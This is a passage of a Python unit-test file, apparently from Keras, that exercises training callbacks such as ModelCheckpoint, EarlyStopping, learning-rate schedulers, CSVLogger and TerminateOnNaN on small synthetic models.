    model = testing_utils.get_model_from_layers(layers, input_shape=(10,))
    model.compile(
        loss='categorical_crossentropy', optimizer='rmsprop', metrics=['acc'])
    temp_dir = self.get_temp_dir()
    self.addCleanup(shutil.rmtree, temp_dir, ignore_errors=True)
    filepath = os.path.join(temp_dir, 'checkpoint.h5')
    (x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
        train_samples=TRAIN_SAMPLES,
        test_samples=TEST_SAMPLES,
        input_shape=(INPUT_DIM,),
        num_classes=NUM_CLASSES)
    y_test = np_utils.to_categorical(y_test)
    y_train = np_utils.to_categorical(y_train)
    # case 1: monitor val_loss, mode deduced automatically
    monitor = 'val_loss'
    save_best_only = False
    mode = 'auto'
    model = keras.models.Sequential()
    model.add(
        keras.layers.Dense(
            NUM_HIDDEN, input_dim=INPUT_DIM, activation='relu'))
    model.add(keras.layers.Dense(NUM_CLASSES, activation='softmax'))
    model.compile(
        loss='categorical_crossentropy', optimizer='rmsprop', metrics=['acc'])
    cbks = [
        keras.callbacks.ModelCheckpoint(
            filepath,
            monitor=monitor,
            save_best_only=save_best_only,
            mode=mode)
    ]
    model.fit(
        x_train,
        y_train,
        batch_size=BATCH_SIZE,
        validation_data=(x_test, y_test),
        callbacks=cbks,
        epochs=1,
        verbose=0)
    assert os.path.exists(filepath)
    os.remove(filepath)
    # case 2: explicit 'min' mode
    mode = 'min'
    cbks = [
        keras.callbacks.ModelCheckpoint(
            filepath,
            monitor=monitor,
            save_best_only=save_best_only,
            mode=mode)
    ]
    model.fit(
        x_train,
        y_train,
        batch_size=BATCH_SIZE,
        validation_data=(x_test, y_test),
        callbacks=cbks,
        epochs=1,
        verbose=0)
    assert os.path.exists(filepath)
    os.remove(filepath)
    # case 3: explicit 'max' mode with an accuracy monitor
    mode = 'max'
    monitor = 'val_acc'
    cbks = [
        keras.callbacks.ModelCheckpoint(
            filepath,
            monitor=monitor,
            save_best_only=save_best_only,
            mode=mode)
    ]
    model.fit(
        x_train,
        y_train,
        batch_size=BATCH_SIZE,
        validation_data=(x_test, y_test),
        callbacks=cbks,
        epochs=1,
        verbose=0)
    assert os.path.exists(filepath)
    os.remove(filepath)
    # case 4: save_best_only=True still writes the first (best-so-far) epoch
    save_best_only = True
    cbks = [
        keras.callbacks.ModelCheckpoint(
            filepath,
            monitor=monitor,
            save_best_only=save_best_only,
            mode=mode)
    ]
    model.fit(
        x_train,
        y_train,
        batch_size=BATCH_SIZE,
        validation_data=(x_test, y_test),
        callbacks=cbks,
        epochs=1,
        verbose=0)
    assert os.path.exists(filepath)
    os.remove(filepath)
    # Case: metric not available.
    cbks = [
        keras.callbacks.ModelCheckpoint(
            filepath,
            monitor='unknown',
            save_best_only=True)
    ]
    model.fit(
        x_train,
        y_train,
        batch_size=BATCH_SIZE,
        validation_data=(x_test, y_test),
        callbacks=cbks,
        epochs=1,
        verbose=0)
    # File won't be written.
    assert not os.path.exists(filepath)
    # case 5: `period=2` saves only every second epoch
    save_best_only = False
    period = 2
    mode = 'auto'
    filepath = os.path.join(temp_dir, 'checkpoint.{epoch:02d}.h5')
    cbks = [
        keras.callbacks.ModelCheckpoint(
            filepath,
            monitor=monitor,
            save_best_only=save_best_only,
            mode=mode,
            period=period)
    ]
    model.fit(
        x_train,
        y_train,
        batch_size=BATCH_SIZE,
        validation_data=(x_test, y_test),
        callbacks=cbks,
        epochs=4,
        verbose=1)
    assert os.path.exists(filepath.format(epoch=2))
    assert os.path.exists(filepath.format(epoch=4))
    os.remove(filepath.format(epoch=2))
    os.remove(filepath.format(epoch=4))
    assert not os.path.exists(filepath.format(epoch=1))
    assert not os.path.exists(filepath.format(epoch=3))
    # Invalid use: this will raise a warning but not an Exception.
    keras.callbacks.ModelCheckpoint(
        filepath,
        monitor=monitor,
        save_best_only=save_best_only,
        mode='unknown')
    # Case 6: `ModelCheckpoint` with a combination of `save_freq` and `period`.
    # Though `period` is deprecated, we're testing it for
    # backward-compatibility.
    filepath = os.path.join(temp_dir, 'checkpoint.epoch{epoch:02d}.h5')
    cbks = [
        keras.callbacks.ModelCheckpoint(
            filepath, monitor=monitor, mode=mode, save_freq='epoch', period=5)
    ]
    assert not os.path.exists(filepath.format(epoch=0))
    assert not os.path.exists(filepath.format(epoch=5))
    model.fit(
        x_train,
        y_train,
        batch_size=2,
        validation_data=(x_test, y_test),
        callbacks=cbks,
        epochs=10,
        verbose=1)
    # With save_freq='epoch' and period=5, only epochs 5 and 10 are saved.
    assert not os.path.exists(filepath.format(epoch=1))
    assert not os.path.exists(filepath.format(epoch=2))
    assert not os.path.exists(filepath.format(epoch=3))
    assert not os.path.exists(filepath.format(epoch=4))
    assert os.path.exists(filepath.format(epoch=5))
    assert not os.path.exists(filepath.format(epoch=6))
    assert os.path.exists(filepath.format(epoch=10))
    os.remove(filepath.format(epoch=5))
    os.remove(filepath.format(epoch=10))
    # Case 7: `ModelCheckpoint` with an integer `save_freq`
    filepath = os.path.join(temp_dir, 'checkpoint.epoch{epoch:02d}.h5')
    cbks = [
        keras.callbacks.ModelCheckpoint(
            filepath,
            monitor=monitor,
            save_best_only=save_best_only,
            mode=mode,
            save_freq=15,
            period=100)  # The period should be ignored (this test tests this).
    ]
    assert not os.path.exists(filepath.format(epoch=3))
    model.fit(
        x_train,
        y_train,
        batch_size=2,
        validation_data=(x_test, y_test),
        callbacks=cbks,
        epochs=10,
        verbose=1)
    # save_freq=15 batches with 5 batches/epoch -> saves land on epochs 3, 6, 9.
    assert not os.path.exists(filepath.format(epoch=1))
    assert not os.path.exists(filepath.format(epoch=2))
    assert os.path.exists(filepath.format(epoch=3))
    assert not os.path.exists(filepath.format(epoch=4))
    assert not os.path.exists(filepath.format(epoch=5))
    assert os.path.exists(filepath.format(epoch=6))
    assert not os.path.exists(filepath.format(epoch=7))
    assert not os.path.exists(filepath.format(epoch=8))
    assert os.path.exists(filepath.format(epoch=9))
    os.remove(filepath.format(epoch=3))
    os.remove(filepath.format(epoch=6))
    os.remove(filepath.format(epoch=9))
    # Case 8: `ModelCheckpoint` with valid and invalid save_freq argument.
    with self.assertRaisesRegexp(ValueError, 'Unrecognized save_freq'):
      keras.callbacks.ModelCheckpoint(
          filepath,
          monitor=monitor,
          save_best_only=save_best_only,
          mode=mode,
          save_freq='invalid_save_freq')
    # The following should not raise ValueError.
    keras.callbacks.ModelCheckpoint(
        filepath,
        monitor=monitor,
        save_best_only=save_best_only,
        mode=mode,
        save_freq='epoch')
    keras.callbacks.ModelCheckpoint(
        filepath,
        monitor=monitor,
        save_best_only=save_best_only,
        mode=mode,
        save_freq=3)
def _get_dummy_resource_for_model_checkpoint_testing(self):
  """Build a trivial model, dataset, checkpoint callback, and filepath.

  Returns a (model, dataset, callback, filepath) tuple shared by the
  ModelCheckpoint tests below.
  """
  # Very simple bias model to eliminate randomness.
  bias_model = sequential.Sequential()
  bias_model.add(testing_utils.Bias(input_shape=(1,)))
  bias_model.compile(
      loss='mae', optimizer=gradient_descent.SGD(0.1), metrics=['mae'])

  # Simple training input: 16 constant samples in batches of 8.
  inputs = [[1.]] * 16
  labels = [[0.]] * 16
  dataset = dataset_ops.Dataset.from_tensor_slices(
      (inputs, labels)).batch(8, drop_remainder=True)

  checkpoint_path = os.path.join(
      self.get_temp_dir(), 'checkpoint.epoch{epoch:02d}.h5')
  # The filepath shouldn't exist at the beginning.
  self.assertFalse(os.path.exists(checkpoint_path))
  checkpoint_cb = keras.callbacks.ModelCheckpoint(
      filepath=checkpoint_path, save_weights_only=True)
  return bias_model, dataset, checkpoint_cb, checkpoint_path
def _run_load_weights_on_restart_test_common_iterations(self):
  """Fit with a checkpoint callback, then one more epoch without it.

  Returns (model, dataset, filepath pattern, weights after the extra,
  uncheckpointed epoch) for reuse by the load_weights_on_restart tests.
  """
  (model, train_ds, callback,
   filepath) = self._get_dummy_resource_for_model_checkpoint_testing()
  initial_epochs = 3
  model.fit(train_ds, epochs=initial_epochs, callbacks=[callback])

  # The files should exist after fitting with callback.
  for epoch in range(initial_epochs):
    self.assertTrue(os.path.exists(filepath.format(epoch=epoch + 1)))
  self.assertFalse(os.path.exists(filepath.format(epoch=initial_epochs + 1)))
  self.assertEqual(
      callback._get_most_recently_modified_file_matching_pattern(filepath),
      filepath.format(epoch=initial_epochs))

  model.fit(train_ds, epochs=1)
  weights_after_one_more_epoch = model.get_weights()

  # The filepath should continue to exist after fitting without callback.
  for epoch in range(initial_epochs):
    self.assertTrue(os.path.exists(filepath.format(epoch=epoch + 1)))

  return model, train_ds, filepath, weights_after_one_more_epoch
@staticmethod
def get_ModelCheckpoint_load_weights_on_restart_true_test(save_weights_only):
  """Build a test verifying `load_weights_on_restart=True` restores weights.

  `save_weights_only` is forwarded to the ModelCheckpoint under test; the
  returned function is installed as a test method below via `__func__`.
  """

  def func(self):
    (model, train_ds, filepath, weights_after_one_more_epoch
    ) = self._run_load_weights_on_restart_test_common_iterations()

    # Sleep for some short time period ensuring the files are created with
    # a different time (in MacOS OSS the granularity is only 1 second).
    time.sleep(2)
    callback = keras.callbacks.ModelCheckpoint(
        filepath=filepath,
        save_weights_only=save_weights_only,
        load_weights_on_restart=True)
    model.fit(train_ds, epochs=1, callbacks=[callback])
    weights_after_model_restoring_and_one_more_epoch = model.get_weights()

    # The most recent checkpoint is now the one written by the fit above.
    self.assertEqual(
        callback._get_most_recently_modified_file_matching_pattern(filepath),
        filepath.format(epoch=1))

    model.fit(
        train_ds,
        epochs=1,
        callbacks=[
            keras.callbacks.ModelCheckpoint(
                filepath=filepath,
                save_weights_only=save_weights_only,
                load_weights_on_restart=True)
        ])
    weights_with_one_final_extra_epoch = model.get_weights()

    # Asserting the weights one epoch after initial fitting and another epoch
    # after that are closed, if a ModelCheckpoint with
    # load_weights_on_restart=True is given (so the model is restored at the
    # beginning of training).
    self.assertAllClose(weights_after_one_more_epoch,
                        weights_after_model_restoring_and_one_more_epoch)
    self.assertNotAllClose(weights_after_one_more_epoch,
                           weights_with_one_final_extra_epoch)

  return func
@staticmethod
def get_ModelCheckpoint_load_weights_on_restart_false_test(save_weights_only):
  """Build a test verifying the default (no restore) checkpoint behavior.

  `save_weights_only` is forwarded to the ModelCheckpoint under test; the
  returned function is installed as a test method below via `__func__`.
  """

  def func(self):
    (model, train_ds, filepath, weights_after_one_more_epoch
    ) = self._run_load_weights_on_restart_test_common_iterations()

    model.fit(
        train_ds,
        epochs=1,
        callbacks=[
            keras.callbacks.ModelCheckpoint(
                filepath=filepath, save_weights_only=save_weights_only)
        ])
    weights_after_model_restoring_and_one_more_epoch = model.get_weights()

    # Asserting the weights one epoch after initial fitting and another epoch
    # after that are different, if a ModelCheckpoint with
    # load_weights_on_restart=False is given (so the model is not restored at
    # the beginning of training).
    self.assertNotAllClose(weights_after_one_more_epoch,
                           weights_after_model_restoring_and_one_more_epoch)

  return func
# Materialize the four parameterized load_weights_on_restart tests.
# `.__func__` unwraps the staticmethod so the factory can be called at
# class-definition time.
test_model_checkpoint_load_weights_on_restart_true_save_weights_only_true = \
    get_ModelCheckpoint_load_weights_on_restart_true_test.__func__(True)

test_model_checkpoint_load_weights_on_restart_true_save_weights_only_false = \
    get_ModelCheckpoint_load_weights_on_restart_true_test.__func__(False)

test_model_checkpoint_load_weights_on_restart_false_save_weights_only_true = \
    get_ModelCheckpoint_load_weights_on_restart_false_test.__func__(True)

test_model_checkpoint_load_weights_on_restart_false_save_weights_only_false \
    = get_ModelCheckpoint_load_weights_on_restart_false_test.__func__(False)
def test_ModelCheckpoint_override_if_file_exist(self):
  """ModelCheckpoint overwrites an existing checkpoint file when refitting."""
  (model, train_ds, filepath,
   _) = self._run_load_weights_on_restart_test_common_iterations()

  # Sleep for some short time period to ensure the files are created with
  # a different time (in MacOS OSS the granularity is only 1 second).
  time.sleep(2)
  callback = keras.callbacks.ModelCheckpoint(
      filepath=filepath, save_weights_only=True)
  model.load_weights(
      callback._get_most_recently_modified_file_matching_pattern(filepath))
  weights_before_additional_fit = model.get_weights()
  model.fit(train_ds, epochs=1, callbacks=[callback])
  model.load_weights(
      callback._get_most_recently_modified_file_matching_pattern(filepath))
  weights_after_additional_fit = model.get_weights()

  # The latest checkpoint's weights changed, so the file was overwritten
  # rather than kept.
  self.assertNotAllClose(weights_before_additional_fit,
                         weights_after_additional_fit)
def test_fit_with_ModelCheckpoint_with_tf_config(self):
  """`model.fit` with ModelCheckpoint works while `TF_CONFIG` is set."""
  (model, train_ds, callback,
   _) = self._get_dummy_resource_for_model_checkpoint_testing()

  os.environ['TF_CONFIG'] = json.dumps({
      'cluster': {
          'worker': ['localhost:23333']
      },
      'task': {
          'type': 'worker',
          'index': 0
      }
  })
  # Remove the variable once this test finishes so the fake cluster spec
  # does not leak into (and reconfigure) other tests in this process.
  self.addCleanup(os.environ.pop, 'TF_CONFIG', None)

  # `model.fit()` should work regardless of the presence of `TF_CONFIG`.
  model.fit(train_ds, epochs=1, callbacks=[callback])
def test_fit_with_ModelCheckpoint_with_dir_as_h5_filepath(self):
  """Passing an existing directory as an .h5 filepath raises IOError."""
  (model, train_ds, callback,
   filepath) = self._get_dummy_resource_for_model_checkpoint_testing()

  temp_dir = self.get_temp_dir()
  filepath = os.path.join(temp_dir, 'temp.h5')

  # Turn the target path into a directory to provoke the error.
  self.assertFalse(os.path.exists(filepath))
  os.mkdir(filepath)
  self.assertTrue(os.path.exists(filepath))

  callback = keras.callbacks.ModelCheckpoint(filepath=filepath)

  with self.assertRaisesRegexp(IOError, 'Please specify a non-directory '
                                        'filepath for ModelCheckpoint.'):
    model.fit(train_ds, epochs=1, callbacks=[callback])
def test_ModelCheckpoint_with_bad_path_placeholders(self):
  """A filepath placeholder missing from the logs raises KeyError."""
  (model, train_ds, callback,
   filepath) = self._get_dummy_resource_for_model_checkpoint_testing()

  temp_dir = self.get_temp_dir()
  # `mape` is not a logged metric here, so formatting must fail.
  filepath = os.path.join(temp_dir, 'chkpt_{epoch:02d}_{mape:.2f}.h5')
  callback = keras.callbacks.ModelCheckpoint(filepath=filepath)

  with self.assertRaisesRegexp(KeyError, 'Failed to format this callback '
                                         'filepath.*'):
    model.fit(train_ds, epochs=1, callbacks=[callback])
def test_EarlyStopping(self):
  """Smoke-test EarlyStopping across mode/monitor combinations."""
  with self.cached_session():
    np.random.seed(123)
    (x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
        train_samples=TRAIN_SAMPLES,
        test_samples=TEST_SAMPLES,
        input_shape=(INPUT_DIM,),
        num_classes=NUM_CLASSES)
    y_test = np_utils.to_categorical(y_test)
    y_train = np_utils.to_categorical(y_train)
    model = testing_utils.get_small_sequential_mlp(
        num_hidden=NUM_HIDDEN, num_classes=NUM_CLASSES, input_dim=INPUT_DIM)
    model.compile(
        loss='categorical_crossentropy', optimizer='rmsprop', metrics=['acc'])

    # (mode, monitor) pairs to exercise, including an unknown pair.
    cases = [
        ('max', 'val_acc'),
        ('min', 'val_loss'),
        ('auto', 'val_acc'),
        ('auto', 'loss'),
        ('unknown', 'unknown')
    ]
    for mode, monitor in cases:
      patience = 0
      cbks = [
          keras.callbacks.EarlyStopping(
              patience=patience, monitor=monitor, mode=mode)
      ]
      model.fit(
          x_train,
          y_train,
          batch_size=BATCH_SIZE,
          validation_data=(x_test, y_test),
          callbacks=cbks,
          epochs=5,
          verbose=0)
def test_EarlyStopping_reuse(self):
  """EarlyStopping lets training run for at least `patience` epochs."""
  with self.cached_session():
    np.random.seed(1337)
    patience = 3
    data = np.random.random((100, 1))
    labels = np.where(data > 0.5, 1, 0)
    model = keras.models.Sequential((keras.layers.Dense(
        1, input_dim=1, activation='relu'), keras.layers.Dense(
            1, activation='sigmoid'),))
    model.compile(
        optimizer='sgd', loss='binary_crossentropy', metrics=['accuracy'])
    # NOTE(review): this get/set round-trip is a no-op; presumably a
    # leftover from a variant that reset weights between runs.
    weights = model.get_weights()

    # This should allow training to go for at least `patience` epochs
    model.set_weights(weights)
    stopper = keras.callbacks.EarlyStopping(monitor='acc', patience=patience)
    hist = model.fit(data, labels, callbacks=[stopper], verbose=0, epochs=20)
    assert len(hist.epoch) >= patience
def test_EarlyStopping_with_baseline(self):
  """EarlyStopping with a `baseline` stops immediately without patience,
  but allows at least `patience` epochs when patience is set."""
  with self.cached_session():
    np.random.seed(1337)
    baseline = 0.6
    (data, labels), _ = testing_utils.get_test_data(
        train_samples=100,
        test_samples=50,
        input_shape=(1,),
        num_classes=NUM_CLASSES)
    model = testing_utils.get_small_sequential_mlp(
        num_hidden=1, num_classes=1, input_dim=1)
    model.compile(
        optimizer='sgd', loss='binary_crossentropy', metrics=['acc'])

    # No patience: training stops after the first epoch below the baseline.
    stopper = keras.callbacks.EarlyStopping(monitor='acc',
                                            baseline=baseline)
    hist = model.fit(data, labels, callbacks=[stopper], verbose=0, epochs=20)
    assert len(hist.epoch) == 1

    # With patience: training runs at least `patience` epochs.
    patience = 3
    stopper = keras.callbacks.EarlyStopping(monitor='acc',
                                            patience=patience,
                                            baseline=baseline)
    hist = model.fit(data, labels, callbacks=[stopper], verbose=0, epochs=20)
    assert len(hist.epoch) >= patience
def test_EarlyStopping_final_weights_when_restoring_model_weights(self):
  """`restore_best_weights` leaves the model holding the best epoch's weights."""

  class DummyModel(object):
    """Stand-in model whose 'weights' record the last epoch written."""

    def __init__(self):
      self.stop_training = False
      self.weights = -1

    def get_weights(self):
      return self.weights

    def set_weights(self, weights):
      self.weights = weights

    def set_weight_to_epoch(self, epoch):
      self.weights = epoch

  early_stop = keras.callbacks.EarlyStopping(monitor='val_loss',
                                             patience=2,
                                             restore_best_weights=True)
  early_stop.model = DummyModel()
  # Loss bottoms out at index 2 (0.1000), then degrades for two epochs,
  # which exactly exhausts patience=2.
  losses = [0.2, 0.15, 0.1, 0.11, 0.12]
  epochs_trained = 0
  early_stop.on_train_begin()
  for epoch, loss in enumerate(losses):
    epochs_trained += 1
    early_stop.model.set_weight_to_epoch(epoch=epoch)
    early_stop.on_epoch_end(epoch, logs={'val_loss': loss})
    if early_stop.model.stop_training:
      break
  # Because best weights are restored, the model ends at the weights from
  # the best epoch (epoch 2), not the epoch where training stopped.
  self.assertEqual(early_stop.model.get_weights(), 2)
def test_RemoteMonitor(self):
  """Smoke-test RemoteMonitor.on_epoch_end against the default address."""
  if requests is None:
    # skipTest raises unittest.SkipTest, so nothing below runs when
    # `requests` is unavailable (the old `return None` here was dead code).
    self.skipTest('`requests` required to run this test')

  monitor = keras.callbacks.RemoteMonitor()
  # This will raise a warning since the default address in unreachable:
  monitor.on_epoch_end(0, logs={'loss': 0.})
def test_LearningRateScheduler(self):
  """LearningRateScheduler works with all supported schedule signatures."""
  with self.cached_session():
    np.random.seed(1337)
    (x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
        train_samples=TRAIN_SAMPLES,
        test_samples=TEST_SAMPLES,
        input_shape=(INPUT_DIM,),
        num_classes=NUM_CLASSES)
    y_test = np_utils.to_categorical(y_test)
    y_train = np_utils.to_categorical(y_train)
    model = testing_utils.get_small_sequential_mlp(
        num_hidden=NUM_HIDDEN, num_classes=NUM_CLASSES, input_dim=INPUT_DIM)
    model.compile(
        loss='categorical_crossentropy',
        optimizer='sgd',
        metrics=['accuracy'])

    # Schedule as a function of the epoch only.
    cbks = [keras.callbacks.LearningRateScheduler(lambda x: 1. / (1. + x))]
    model.fit(
        x_train,
        y_train,
        batch_size=BATCH_SIZE,
        validation_data=(x_test, y_test),
        callbacks=cbks,
        epochs=5,
        verbose=0)
    # NOTE(review): the difference is not wrapped in abs(), so this assert
    # is trivially true whenever lr is below the target -- confirm intent.
    assert (
        float(keras.backend.get_value(
            model.optimizer.lr)) - 0.2) < keras.backend.epsilon()

    # Schedule as a function of (epoch, current_lr).
    cbks = [keras.callbacks.LearningRateScheduler(lambda x, lr: lr / 2)]
    model.compile(
        loss='categorical_crossentropy',
        optimizer='sgd',
        metrics=['accuracy'])
    model.fit(
        x_train,
        y_train,
        batch_size=BATCH_SIZE,
        validation_data=(x_test, y_test),
        callbacks=cbks,
        epochs=2,
        verbose=0)
    assert (
        float(keras.backend.get_value(
            model.optimizer.lr)) - 0.01 / 4) < keras.backend.epsilon()

    # Schedule backed by a LearningRateSchedule object (CosineDecay).
    cbks = [
        keras.callbacks.LearningRateScheduler(
            lambda epoch, _: learning_rate_schedule.CosineDecay(0.01, 2)
            (epoch))
    ]
    model.compile(
        loss='categorical_crossentropy',
        optimizer='sgd',
        metrics=['accuracy'])
    model.fit(
        x_train,
        y_train,
        batch_size=BATCH_SIZE,
        validation_data=(x_test, y_test),
        callbacks=cbks,
        epochs=2,
        verbose=0)

    # Expected lr after 2 epochs of CosineDecay(0.01, 2), computed in numpy.
    cosine_decay_np = 0.5 * (1 + np.cos(np.pi * (1 / 2)))
    decayed_learning_rate = 0.01 * cosine_decay_np

    assert (float(keras.backend.get_value(model.optimizer.lr)) -
            decayed_learning_rate) < keras.backend.epsilon()
def test_ReduceLROnPlateau(self):
  """ReduceLROnPlateau keeps or reduces lr depending on `min_delta`."""
  with self.cached_session():
    np.random.seed(1337)
    (x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
        train_samples=TRAIN_SAMPLES,
        test_samples=TEST_SAMPLES,
        input_shape=(INPUT_DIM,),
        num_classes=NUM_CLASSES)
    y_test = np_utils.to_categorical(y_test)
    y_train = np_utils.to_categorical(y_train)

    def make_model():
      # Fixed seeds so both runs start from identical weights.
      random_seed.set_random_seed(1234)
      np.random.seed(1337)
      model = testing_utils.get_small_sequential_mlp(
          num_hidden=NUM_HIDDEN, num_classes=NUM_CLASSES, input_dim=INPUT_DIM)
      model.compile(
          loss='categorical_crossentropy',
          optimizer=gradient_descent.SGD(lr=0.1))
      return model

    # TODO(psv): Make sure the callback works correctly when min_delta is
    # set as 0. Test fails when the order of this callback and assertion is
    # interchanged.
    model = make_model()
    cbks = [
        keras.callbacks.ReduceLROnPlateau(
            monitor='val_loss',
            factor=0.1,
            min_delta=0,
            patience=1,
            cooldown=5)
    ]
    model.fit(
        x_train,
        y_train,
        batch_size=BATCH_SIZE,
        validation_data=(x_test, y_test),
        callbacks=cbks,
        epochs=2,
        verbose=0)
    # min_delta=0: lr should remain at its initial value.
    self.assertAllClose(
        float(keras.backend.get_value(model.optimizer.lr)), 0.1, atol=1e-4)

    model = make_model()
    # This should reduce the LR after the first epoch (due to high epsilon).
    cbks = [
        keras.callbacks.ReduceLROnPlateau(
            monitor='val_loss',
            factor=0.1,
            min_delta=10,
            patience=1,
            cooldown=5)
    ]
    model.fit(
        x_train,
        y_train,
        batch_size=BATCH_SIZE,
        validation_data=(x_test, y_test),
        callbacks=cbks,
        epochs=2,
        verbose=2)
    # lr must have been scaled once by factor=0.1.
    self.assertAllClose(
        float(keras.backend.get_value(model.optimizer.lr)), 0.01, atol=1e-4)
def test_ReduceLROnPlateau_patience(self):
  """lr is only reduced after `patience` epochs without improvement."""

  class DummyOptimizer(object):
    """Optimizer stand-in holding just an lr variable."""

    def __init__(self):
      self.lr = keras.backend.variable(1.0)

  class DummyModel(object):
    """Model stand-in exposing only an optimizer."""

    def __init__(self):
      self.optimizer = DummyOptimizer()

  cbk = keras.callbacks.ReduceLROnPlateau(
      monitor='val_loss', patience=2)
  cbk.model = DummyModel()

  # One improvement, then two worse epochs -- exactly exhausting patience.
  losses = [0.0860, 0.1096, 0.1040]
  observed_lrs = []
  for epoch, loss in enumerate(losses):
    cbk.on_epoch_end(epoch, logs={'val_loss': loss})
    observed_lrs.append(keras.backend.get_value(cbk.model.optimizer.lr))

  # Every recorded lr except the final one must still be 1.0; only the last
  # epoch triggers the reduction.
  for early_lr in observed_lrs[:-1]:
    self.assertEqual(early_lr, 1.0)
  self.assertLess(observed_lrs[-1], 1.0)
def test_ReduceLROnPlateau_backwards_compatibility(self):
  """The deprecated `epsilon` kwarg warns and maps onto `min_delta`."""
  with test.mock.patch.object(logging, 'warning') as mock_log:
    reduce_on_plateau = keras.callbacks.ReduceLROnPlateau(epsilon=1e-13)
    self.assertRegexpMatches(
        str(mock_log.call_args), '`epsilon` argument is deprecated')
  # The legacy name must not survive as an attribute.
  self.assertFalse(hasattr(reduce_on_plateau, 'epsilon'))
  self.assertTrue(hasattr(reduce_on_plateau, 'min_delta'))
  self.assertEqual(reduce_on_plateau.min_delta, 1e-13)
def test_CSVLogger(self):
  """CSVLogger writes, appends to, and reuses a log file correctly."""
  with self.cached_session():
    np.random.seed(1337)
    temp_dir = self.get_temp_dir()
    self.addCleanup(shutil.rmtree, temp_dir, ignore_errors=True)
    filepath = os.path.join(temp_dir, 'log.tsv')

    sep = '\t'
    (x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
        train_samples=TRAIN_SAMPLES,
        test_samples=TEST_SAMPLES,
        input_shape=(INPUT_DIM,),
        num_classes=NUM_CLASSES)
    y_test = np_utils.to_categorical(y_test)
    y_train = np_utils.to_categorical(y_train)

    def make_model():
      np.random.seed(1337)
      model = testing_utils.get_small_sequential_mlp(
          num_hidden=NUM_HIDDEN, num_classes=NUM_CLASSES, input_dim=INPUT_DIM)
      model.compile(
          loss='categorical_crossentropy',
          optimizer=gradient_descent.SGD(lr=0.1),
          metrics=['accuracy'])
      return model

    # case 1, create new file with defined separator
    model = make_model()
    cbks = [keras.callbacks.CSVLogger(filepath, separator=sep)]
    model.fit(
        x_train,
        y_train,
        batch_size=BATCH_SIZE,
        validation_data=(x_test, y_test),
        callbacks=cbks,
        epochs=1,
        verbose=0)

    assert os.path.exists(filepath)
    with open(filepath) as csvfile:
      dialect = csv.Sniffer().sniff(csvfile.read())
    assert dialect.delimiter == sep
    del model
    del cbks

    # case 2, append data to existing file, skip header
    model = make_model()
    cbks = [keras.callbacks.CSVLogger(filepath, separator=sep, append=True)]
    model.fit(
        x_train,
        y_train,
        batch_size=BATCH_SIZE,
        validation_data=(x_test, y_test),
        callbacks=cbks,
        epochs=1,
        verbose=0)

    # case 3, reuse of CSVLogger object
    model.fit(
        x_train,
        y_train,
        batch_size=BATCH_SIZE,
        validation_data=(x_test, y_test),
        callbacks=cbks,
        epochs=2,
        verbose=0)

    with open(filepath) as csvfile:
      list_lines = csvfile.readlines()
      for line in list_lines:
        assert line.count(sep) == 4
      assert len(list_lines) == 5
      output = ' '.join(list_lines)
      # Exactly one header row across all three cases (appends skip it).
      assert len(re.findall('epoch', output)) == 1

    os.remove(filepath)
def test_stop_training_csv(self):
  # Test that using the CSVLogger callback with the TerminateOnNaN callback
  # does not result in invalid CSVs.
  np.random.seed(1337)
  tmpdir = self.get_temp_dir()
  self.addCleanup(shutil.rmtree, tmpdir, ignore_errors=True)

  with self.cached_session():
    fp = os.path.join(tmpdir, 'test.csv')
    (x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
        train_samples=TRAIN_SAMPLES,
        test_samples=TEST_SAMPLES,
        input_shape=(INPUT_DIM,),
        num_classes=NUM_CLASSES)

    y_test = np_utils.to_categorical(y_test)
    y_train = np_utils.to_categorical(y_train)
    cbks = [keras.callbacks.TerminateOnNaN(), keras.callbacks.CSVLogger(fp)]
    model = keras.models.Sequential()
    for _ in range(5):
      model.add(keras.layers.Dense(2, input_dim=INPUT_DIM, activation='relu'))
    model.add(keras.layers.Dense(NUM_CLASSES, activation='linear'))
    model.compile(loss='mean_squared_error',
                  optimizer='rmsprop')

    def data_generator():
      # Cycles through real batches until 3 passes over the data have been
      # yielded, after which it emits all-NaN batches to trigger
      # TerminateOnNaN.
      i = 0
      max_batch_index = len(x_train) // BATCH_SIZE
      tot = 0
      while 1:
        if tot > 3 * len(x_train):
          yield (np.ones([BATCH_SIZE, INPUT_DIM]) * np.nan,
                 np.ones([BATCH_SIZE, NUM_CLASSES]) * np.nan)
        else:
          yield (x_train[i * BATCH_SIZE: (i + 1) * BATCH_SIZE],
                 y_train[i * BATCH_SIZE: (i + 1) * BATCH_SIZE])
        i += 1
        tot += 1
        i %= max_batch_index

    history = model.fit_generator(data_generator(),
                                  len(x_train) // BATCH_SIZE,
                                  validation_data=(x_test, y_test),
                                  callbacks=cbks,
                                  epochs=20)
    loss = history.history['loss']
    assert len(loss) > 1
    assert loss[-1] == np.inf or np.isnan(loss[-1])

    values = []
    with open(fp) as f:
      for x in csv.reader(f):
        # In windows, due to \r\n line ends we may end up reading empty lines
        # after each line. Skip empty lines.
        if x:
          values.append(x)
    assert 'nan' in values[-1], 'The last epoch was not logged.'
@keras_parameterized.run_all_keras_modes(always_skip_v1=True)
def test_TerminateOnNaN(self):
  """Training halts after the first epoch once loss becomes NaN."""
  np.random.seed(1337)
  (x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
      train_samples=TRAIN_SAMPLES,
      test_samples=TEST_SAMPLES,
      input_shape=(INPUT_DIM,),
      num_classes=NUM_CLASSES)

  y_test = np_utils.to_categorical(y_test)
  y_train = np_utils.to_categorical(y_train)
  cbks = [keras.callbacks.TerminateOnNaN()]
  model = keras.models.Sequential()
  # Huge constant initializer drives the loss to NaN almost immediately.
  initializer = keras.initializers.Constant(value=1e5)
  for _ in range(5):
    model.add(
        keras.layers.Dense(
            2,
            input_dim=INPUT_DIM,
            activation='relu',
            kernel_initializer=initializer))
  model.add(keras.layers.Dense(NUM_CLASSES))
  model.compile(loss='mean_squared_error', optimizer='rmsprop')

  history = model.fit(
      x_train,
      y_train,
      batch_size=BATCH_SIZE,
      validation_data=(x_test, y_test),
      callbacks=cbks,
      epochs=20)
  loss = history.history['loss']
  self.assertEqual(len(loss), 1)
  self.assertTrue(np.isnan(loss[0]))
@unittest.skipIf(
    os.name == 'nt',
    'use_multiprocessing=True does not work on windows properly.')
def test_LambdaCallback(self):
  """LambdaCallback's on_train_end hook fires after training completes."""
  with self.cached_session():
    np.random.seed(1337)
